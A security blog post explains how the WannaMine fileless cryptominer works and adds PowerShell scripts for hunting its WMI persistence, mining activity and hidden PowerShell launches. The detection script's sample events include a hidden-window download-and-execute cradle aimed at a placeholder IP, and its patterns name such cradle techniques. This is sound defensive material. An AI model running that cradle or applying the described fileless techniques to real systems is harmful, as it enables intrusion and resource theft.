How WannaMine Works: The Fileless Cryptominer Worm That Turns Windows Admin Tools Into a Mining Rig

By Ash K

WannaMine is not the loud, crash-your-system kind of malware that immediately gives itself away. Instead, it operates quietly, efficiently, and almost invisibly, turning compromised Windows systems into cryptocurrency mining engines without leaving the usual forensic trail behind. Its defining trait is that it rarely writes anything to disk.

Rather than relying on dropped executables, WannaMine abuses tools that already exist on most Windows machines. PowerShell, Windows Management Instrumentation, and built-in administrative capabilities become its execution environment. This “living-off-the-land” approach allows it to blend into legitimate system activity while steadily draining CPU resources to mine Monero.

Why WannaMine is considered fileless

Most malware leaves footprints. Files, registry keys, scheduled tasks, or startup entries usually give defenders something concrete to hunt for. WannaMine avoids that model almost entirely.

The malware stores its core components inside the WMI repository and executes them directly from memory. Persistence is achieved through WMI event subscriptions rather than startup files or services. From a defender’s perspective, that shifts detection away from traditional file-based indicators and toward behavioral signals that are far easier to miss.

Initial access: simple lures and old vulnerabilities

The infection chain often begins in one of two ways. The first is depressingly familiar: a phishing email carrying a malicious batch file disguised as something routine. Once opened, it quietly launches PowerShell and pulls the next stage into memory.

The second path targets environments that have not patched critical SMB flaws. WannaMine is capable of exploiting EternalBlue (MS17-010), allowing it to compromise exposed systems directly over the network. This makes it particularly dangerous in flat networks where legacy servers still exist.

After gaining execution, the malware checks whether the operating system is 32-bit or 64-bit and retrieves the appropriate PowerShell payload. From this point on, almost everything happens in memory.

A modular design hidden inside WMI

WannaMine behaves less like a single script and more like a toolkit. Its components are divided into modules, each responsible for a specific task such as credential harvesting, lateral movement, or mining.

These modules are stored as properties inside custom WMI classes with names that resemble legitimate system or application components. When needed, the malware reads those properties, reconstructs the code, and executes it on demand. This design allows the attacker to reuse the same framework for multiple operations without constantly re-downloading payloads.

Persistence without startup entries

Persistence is handled through WMI event consumers rather than registry keys or scheduled tasks. The malware sets up event triggers that execute PowerShell whenever certain system conditions are met, such as service activity or system events.

Because WMI is commonly used by administrators and management tools, this persistence mechanism can remain unnoticed for long periods, especially in environments where WMI auditing is minimal or nonexistent.
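The two WMI abuses described above, modules stored as properties of look-alike classes and persistence through event filter/consumer bindings, can both be audited from PowerShell. The following hunting script is an added example and not code from the original post or from the Picus analysis it credits; the `root\default` namespace, the built-in class exclusion list and the size thresholds are assumptions chosen for this example and should be tuned to the estate being examined. It needs an elevated PowerShell 5.1 or later session.

```powershell
# Added hunting script, not code from the original post or the Picus analysis.
# Run in an elevated PowerShell 5.1+ session. Namespace names, the exclusion list
# and the size thresholds below are assumptions chosen for this example.

# --- Part 1: permanent WMI event subscriptions (filter -> consumer bindings) ---
$subNs     = 'root\subscription'
$filters   = @(Get-CimInstance -Namespace $subNs -ClassName __EventFilter)
$consumers = @(Get-CimInstance -Namespace $subNs -ClassName __EventConsumer)
$bindings  = @(Get-CimInstance -Namespace $subNs -ClassName __FilterToConsumerBinding)

# Consumer payloads that launch PowerShell with the flags listed in the IoC section,
# or that evaluate downloaded/encoded script, are what we want to surface.
$launchPattern = 'powershell|pwsh|-nop\b|-noni\b|-w(indowstyle)?\s+hidden|' +
                 '-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|\bIEX\b|Invoke-Expression|' +
                 'DownloadString|Net\.WebClient'

Write-Host "== $($bindings.Count) permanent subscription binding(s) in $subNs =="
foreach ($b in $bindings) {
    # Filter and Consumer are CIM references; the referenced object's key (Name) links them.
    $f = $filters   | Where-Object { $_.Name -eq $b.Filter.Name }   | Select-Object -First 1
    $c = $consumers | Where-Object { $_.Name -eq $b.Consumer.Name } | Select-Object -First 1
    if (-not $c) { continue }

    # CommandLineEventConsumer runs CommandLineTemplate/ExecutablePath;
    # ActiveScriptEventConsumer runs ScriptText. Properties absent on a class are $null.
    $payload = @($c.CommandLineTemplate, $c.ScriptText, $c.ExecutablePath) |
               Where-Object { $_ } | Select-Object -First 1
    $verdict = if ($payload -match $launchPattern) { 'SUSPICIOUS' } else { 'review' }

    [pscustomobject]@{
        Verdict       = $verdict
        Filter        = $f.Name
        Query         = $f.Query            # the trigger condition (service, process or timer event)
        ConsumerClass = $c.CimClass.CimClassName
        Consumer      = $c.Name
        Payload       = $payload
    }
}

# --- Part 2: custom classes carrying long or base64-looking string values ---
# root\default is a common home for such classes; widen $namespaces for your environment.
$namespaces = @('root\default')
$builtIn    = '^(__|CIM_|MSFT_|Win32_|StdRegProv$|SystemRestore)'   # assumption: known benign names
$b64        = '^[A-Za-z0-9+/\s]{200,}={0,2}$'

foreach ($ns in $namespaces) {
    $custom = Get-CimClass -Namespace $ns | Where-Object { $_.CimClassName -notmatch $builtIn }
    foreach ($cls in $custom) {
        $strProps  = $cls.CimClassProperties | Where-Object { $_.CimType -eq 'String' }
        $instances = @(Get-CimInstance -Namespace $ns -ClassName $cls.CimClassName -ErrorAction SilentlyContinue)
        foreach ($p in $strProps) {
            # A payload may sit in the class's default value or in an instance's property.
            $values = @([string]$p.Value) + @($instances | ForEach-Object { [string]$_.($p.Name) })
            foreach ($v in $values) {
                if ($v.Length -ge 500 -or $v -match $b64) {
                    [pscustomobject]@{
                        Verdict   = 'SUSPICIOUS'
                        Namespace = $ns
                        Class     = $cls.CimClassName
                        Property  = $p.Name
                        Length    = $v.Length
                        Preview   = $v.Substring(0, [Math]::Min(60, $v.Length))
                    }
                }
            }
        }
    }
}
```

Every binding is printed, not only the flagged ones, because legitimate management agents also register subscriptions and the useful output is a short list an analyst can compare against a known baseline. A consumer whose payload matches `$launchPattern`, or a non-system class whose string property is hundreds of characters of base64, is the point at which the host deserves a memory-level look rather than a file scan.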

Credential theft as a force multiplier

Once established on a host, WannaMine attempts to escalate its reach. It loads a PowerShell-based credential dumping module into memory and extracts NTLM hashes or, in some cases, clear-text credentials.

If high-privilege credentials are recovered, the malware shifts strategy. Rather than relying on noisy exploits, it begins using legitimate remote execution techniques to move laterally. This makes its activity appear far more like normal administrative behavior than a worm spreading aggressively.

Lateral movement across the network

With valid credentials, WannaMine uses WMI-based remote execution to launch commands on other systems discovered within the network. This method allows it to spread quickly without dropping files or triggering exploit-based alerts.

When credentials are not available, the malware does not stall. It falls back to exploiting EternalBlue against vulnerable machines, ensuring it can still propagate in poorly patched environments. This dual-path approach makes WannaMine resilient across a wide range of enterprise networks.

Network discovery and target selection

Rather than blindly scanning, WannaMine incorporates logic derived from enterprise assessment tooling to identify reachable systems and viable attack paths. It maps the network, identifies systems that expose SMB, and prioritizes targets that maximize spread.

This is one of the reasons infections can escalate quickly. The malware does not just spread; it spreads intelligently.

Cryptomining and system abuse

Once mining begins, the malware configures the system to stay awake indefinitely, preventing sleep or standby modes that would interrupt mining activity. CPU usage is driven high, often to the point where servers and workstations become sluggish or unusable.

WannaMine also eliminates competition. It scans for processes associated with common mining ports and terminates them, ensuring that its own miner monopolizes system resources. Its mining traffic is pushed through a dedicated port that differs from those used by many off-the-shelf miners.
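The three behaviours in this section, sustained CPU use, outbound traffic on a non-standard port, and a system that refuses to sleep, can be correlated on a single host. The triage script below is an added example and not code from the original post: it samples per-process CPU time over a short window, lists the non-private remote endpoints each heavy process holds open, and then asks Windows what is blocking sleep. The sampling window, the CPU threshold and the private-address regex are assumptions for this example; it needs an elevated session, and `Get-NetTCPConnection` requires Windows 8 / Server 2012 or later.

```powershell
# Added triage script, not code from the original post. The sampling window, CPU threshold
# and private-range regex are assumptions chosen for this example. Run elevated.

function Get-CpuHog {
    param([int]$Seconds = 5, [double]$MinTotalPercent = 25)
    $cores  = [Environment]::ProcessorCount
    $before = @{}
    foreach ($p in Get-Process) {
        try { $before[$p.Id] = $p.TotalProcessorTime } catch { }   # some system processes deny access
    }
    Start-Sleep -Seconds $Seconds
    foreach ($p in Get-Process) {
        if (-not $before.ContainsKey($p.Id)) { continue }          # started during the window
        try { $used = ($p.TotalProcessorTime - $before[$p.Id]).TotalSeconds } catch { continue }
        $pct  = 100 * $used / ($Seconds * $cores)                  # share of the whole machine
        if ($pct -lt $MinTotalPercent) { continue }
        $path = try { $p.Path } catch { $null }                    # protected processes hide their image
        [pscustomobject]@{
            Id         = $p.Id
            Name       = $p.ProcessName
            Path       = $path
            CpuPercent = [Math]::Round($pct, 1)
        }
    }
}

# Loopback, RFC 1918, link-local and unspecified addresses are not interesting for pool traffic.
$private = '^(127\.|10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.|169\.254\.|0\.0\.0\.0$|::1$|::$|fe80:)'

foreach ($hog in Get-CpuHog) {
    # The post notes WannaMine's pool port differs from common miners, so do not filter on
    # port; list every established external peer owned by the heavy process instead.
    $conns = Get-NetTCPConnection -State Established -OwningProcess $hog.Id -ErrorAction SilentlyContinue |
             Where-Object { $_.RemoteAddress -notmatch $private } |
             ForEach-Object { "$($_.RemoteAddress):$($_.RemotePort)" }
    [pscustomobject]@{
        Process    = "$($hog.Name) (PID $($hog.Id))"
        Path       = $hog.Path
        CpuPercent = $hog.CpuPercent
        Outbound   = ($conns -join ', ')
    }
}

# Anything keeping the machine from sleeping is listed under the DISPLAY, SYSTEM,
# AWAYMODE and EXECUTION headings, attributed to the requesting process or driver.
powercfg /requests
```

A long-running process with near-total CPU share, a single persistent connection to an external address, and an entry under `SYSTEM` or `EXECUTION` in the `powercfg /requests` output is the combination the section describes; a legitimate compute job usually fails at least one of the three.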

Why WannaMine still matters today

Although WannaMine is not a brand-new threat, its techniques remain highly relevant. Fileless execution, abuse of legitimate administration tools, and credential-based lateral movement are all tactics still favored by modern attackers.

The malware is a reminder that patching, credential hygiene, and visibility into PowerShell and WMI activity are not optional. As long as enterprise environments trust these tools implicitly, threats like WannaMine will continue to find room to operate.

Indicators of Compromise

  • Hidden PowerShell execution using flags such as -NoP -NonI -W Hidden
  • Outbound PowerShell script retrieval from unfamiliar external IP addresses
  • Unusual WMI event filters, consumers, or bindings not created by known management tools
  • Custom WMI classes resembling legitimate services but containing encoded scripts
  • Use of WMI-based remote execution across multiple internal hosts
  • Unexpected high CPU usage combined with outbound mining-related network traffic
  • SMB scanning or exploitation activity originating from internal systems
  • Termination of processes associated with common cryptomining ports
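The first and fifth indicators in this list are visible in process-creation telemetry: the hidden PowerShell flags appear in the command line, and WMI-based remote execution appears on the receiving host as PowerShell spawned by `WmiPrvSE.exe`. The following detection logic is an added example and not code from the original post. It scores command lines against the indicators above, adds weight for a WMI provider parent, runs over three constructed sample events (not real telemetry; the URL host is a documentation-range address and the base64 string is a placeholder), and includes a helper that reads live Security 4688 and Sysmon Event ID 1 records by field name. The indicator weights and the alert threshold are assumptions for this example.

```powershell
# Added detection logic, not code from the original post. Weights, threshold and the
# sample events are constructed for this example.

$indicators = @(
    @{ Name = 'NoProfile';        Weight = 1; Pattern = '(^|\s)-nop(rofile)?\b' }
    @{ Name = 'NonInteractive';   Weight = 1; Pattern = '(^|\s)-noni(nteractive)?\b' }
    @{ Name = 'HiddenWindow';     Weight = 2; Pattern = '(^|\s)-w(indowstyle)?\s+hidden\b' }
    @{ Name = 'EncodedCommand';   Weight = 2; Pattern = '(^|\s)-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}' }
    @{ Name = 'BypassPolicy';     Weight = 1; Pattern = '(^|\s)-e(p|xec|xecutionpolicy)\s+bypass\b' }
    @{ Name = 'InvokeExpression'; Weight = 2; Pattern = '\bIEX\b|Invoke-Expression' }
    @{ Name = 'RemoteScriptLoad'; Weight = 3; Pattern = 'DownloadString|Net\.WebClient|Invoke-WebRequest|\biwr\b' }
)

function Test-ProcessEvent {
    param([Parameter(Mandatory)]$Event, [int]$Threshold = 5)
    $cmd   = [string]$Event.CommandLine
    $hits  = @()
    $score = 0
    if ($Event.Image -match '(powershell|pwsh)(\.exe)?$') {
        foreach ($i in $indicators) {
            if ($cmd -match $i.Pattern) { $hits += $i.Name; $score += $i.Weight }
        }
        # PowerShell whose parent is the WMI provider host was started by a WMI call,
        # locally or from another machine: the remote execution path the post describes.
        if ($Event.ParentImage -match 'WmiPrvSE\.exe$') { $hits += 'ParentWmiPrvSE'; $score += 3 }
    }
    $verdict = if ($score -ge $Threshold) { 'ALERT' } else { 'ok' }
    [pscustomobject]@{
        Time        = $Event.Time
        Image       = $Event.Image
        ParentImage = $Event.ParentImage
        Score       = $score
        Verdict     = $verdict
        Indicators  = ($hits -join ',')
        CommandLine = $cmd
    }
}

function Get-ProcessCreationEvent {
    # Security 4688 needs "Include command line in process creation events" enabled;
    # Sysmon Event ID 1 carries the same fields under different names. Fields are read by
    # name from the event XML so the code does not depend on positional Properties indexes.
    param([int]$MaxEvents = 500)
    $sources = @(
        @{ LogName = 'Security';                              Id = 4688; Image = 'NewProcessName'; Parent = 'ParentProcessName' }
        @{ LogName = 'Microsoft-Windows-Sysmon/Operational';  Id = 1;    Image = 'Image';          Parent = 'ParentImage' }
    )
    foreach ($s in $sources) {
        $events = Get-WinEvent -FilterHashtable @{ LogName = $s.LogName; Id = $s.Id } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue
        foreach ($e in $events) {
            $xml  = [xml]$e.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { if ($d.Name) { $data[$d.Name] = $d.'#text' } }
            [pscustomobject]@{ Time = $e.TimeCreated; Image = $data[$s.Image]; ParentImage = $data[$s.Parent]; CommandLine = $data['CommandLine'] }
        }
    }
}

$psExe = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$samples = @(   # constructed sample events, not real telemetry
    [pscustomobject]@{ Time = '2024-01-01T08:00:00'; Image = $psExe; ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'powershell.exe -NoProfile -File C:\Scripts\inventory.ps1' }
    [pscustomobject]@{ Time = '2024-01-01T08:05:00'; Image = $psExe; ParentImage = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString(''http://198.51.100.23/stage2.ps1'')"' }
    [pscustomobject]@{ Time = '2024-01-01T08:06:00'; Image = $psExe; ParentImage = 'C:\Windows\System32\wbem\WmiPrvSE.exe'
                       CommandLine = 'powershell.exe -NoP -NonI -W Hidden -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=' }
)

$samples | ForEach-Object { Test-ProcessEvent $_ } | Format-Table Verdict, Score, Indicators, ParentImage -AutoSize
# Live hunt over the local logs (elevated session):
# Get-ProcessCreationEvent | ForEach-Object { Test-ProcessEvent $_ } | Where-Object Verdict -eq 'ALERT'
```

With these weights the inventory script scores 1 (`-NoProfile` alone is routine administration), the batch-file-launched download cradle scores 10, and the encoded command spawned by `WmiPrvSE.exe` scores 9, so the second and third events alert and the first does not. Scoring rather than matching single flags is what keeps the hidden-window or non-interactive switches usable as indicators without paging on every scheduled maintenance script.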

Source credit: Technical analysis derived from “How WannaMine Works: A Fileless Cryptominer Malware,” published by Picus Security.

Ash K
Ashton is a seasoned Cybersecurity Professional with over 25 years of experience in Cybersecurity Research, Cybersecurity Incident response, Products and Security Solutions architecture.